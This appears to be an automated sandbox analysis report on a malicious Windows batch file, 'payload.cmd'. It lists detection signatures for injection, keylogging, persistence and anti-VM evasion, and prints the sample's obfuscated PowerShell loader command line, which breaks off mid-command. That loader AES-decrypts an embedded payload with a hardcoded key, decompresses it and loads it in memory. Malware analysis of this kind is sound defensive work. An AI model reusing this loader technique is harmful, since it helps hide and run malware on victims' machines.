Edit tour
Windows
Analysis Report
payload.cmd
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious command line found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 2460 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\paylo ad.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2440 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 1264 cmdline:
wmic diskd rive get M odel MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - findstr.exe (PID: 3848 cmdline:
findstr /i /c:"DADY HARDDISK" /c:"WDS100 T2B0A" /c: "QEMU HARD DISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - WMIC.exe (PID: 6720 cmdline:
wmic diskd rive get M anufacture r,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - findstr.exe (PID: 4100 cmdline:
findstr /i /c:"BOCHS _" /c:"BXP C___" /c:" QEMU" /c:" VirtualBox " MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - cmd.exe (PID: 5064 cmdline:
cmd.exe /c echo func tion Rgueq ($eXEDy){ $HKJEc=[Sy stem.Secur ity.Crypto graphy.Aes ]::Create( ); $HKJEc. Mode=[Syst em.Securit y.Cryptogr aphy.Ciphe rMode]::CB C; $HKJEc. Padding=[S ystem.Secu rity.Crypt ography.Pa ddingMode] ::PKCS7; $ HKJEc.Key= [System.Co nvert]::Fr omBase64St ring('/Ali 2v8PJeAtW7 Ez9DIBWBzx D0zIlyoV/C L0FcnA0lQ= '); $HKJEc .IV=[Syste m.Convert] ::FromBase 64String(' VZVM+EzOQl 4yXpCtgZwm dA=='); $H ipTi=$HKJE c.CreateDe cryptor(); $ioqgE=$H ipTi.Trans formFinalB lock($eXED y, 0, $eXE Dy.Length) ; $HipTi.D ispose(); $HKJEc.Dis pose(); $i oqgE;}func tion qVeuI ($eXEDy){ Invoke-Exp ression '$ Vcvep=New- Object blc kSblckyblc ksblcktblc keblckmblc k.blckIblc kOblck.blc kMblckeblc kmblckoblc krblckyStb lckrblckeb lckamblck( ,$eXEDy);' .Replace(' blck', '') ; Invoke-E xpression '$MxJbU=Ne w-Object b lckSblckyb lcksblcktb lckeblckm. blckIblckO blck.Mblck eblckmblck oblckrblck yblckSblck tblckrblck eblckablck mblck;'.Re place('blc k', ''); I nvoke-Expr ession '$m nyLH=New-O bject Sblc kyblcksblc ktblckeblc kmblck.blc kIblckOblc k.blckCblc koblckmblc kpblckrblc keblckssbl ckioblcknb lck.GblckZ iblckpblck Sblcktblck rblckeblck ablckmblck ($Vcvep, [ blckIblckO blck.blckC blckoblckm blckpblckr blckeblcks blcksblcki blckoblckn blck.blckC blckoblckm blckpblckr blckeblcks blcksblcki blckoblckn blckMblcko blckdblcke blck]::Dbl ckecblckom blckprblck esblcks);' .Replace(' blck', '') ; $mnyLH.C opyTo($MxJ bU); $mnyL H.Dispose( ); $Vcvep. Dispose(); $MxJbU.Di spose(); $ MxJbU.ToAr ray();}fun ction cOeZ m($eXEDy,$ gMyOP){ In voke-Expre ssion '$uc FsW=blck[b lckSblckyb lcksblcktb lckeblckmb lck.blckRb lckeblckfb lcklblckeb lckcblcktb lckiblckob lcknblck.b lckAblcksb lcksblckeb lckmblckbb lcklblckyb lck]blck:: blckLblcko blckablckd blck([byte []]$eXEDy) ;'.Replace ('blck', ' '); Invoke -Expressio n '$tEhqK= $ucFsW.blc kEblcknblc ktblckrblc kyblckPblc koblckiblc knblcktblc k;'.Replac e('blck', ''); Invok e-Expressi on '$tEhqK .blckIblck nblckvblck oblckkblck eblck(blck $blcknblck ublcklblck lblck, $gM yOP)blck;' .Replace(' blck', '') ;}$tVqDd = 'C:\Users \user\Desk top\payloa d.cmd';$ho st.UI.RawU I.WindowTi tle = $tVq Dd;$kJvvr= [System.IO .File]::Re adAllText( $tVqDd).Sp lit([Envir onment]::N ewLine);fo reach ($gh ynT in $kJ vvr) { if ($ghynT.St artsWith(' :: ')) { $ EnVTr=$ghy nT.Substri ng(3); bre ak; }}$ULN bJ=[string []]$EnVTr. Split('\') ;Invoke-Ex pression ' $hDTZf=qVe uI (Rgueq (blck[blck Cblckoblck nblckvblck eblckrblck tblck]blck :blck:blck Fblckrblck oblckmblck Bblckablck sblckeblck 6blck4blck Sblcktblck rblckiblck nblckgblck ($ULNbJ[0] )));'.Repl ace('blck' , '');Invo ke-Express ion '$TIMG z=qVeuI (R gueq (blck [blckCblck oblcknblck vblckeblck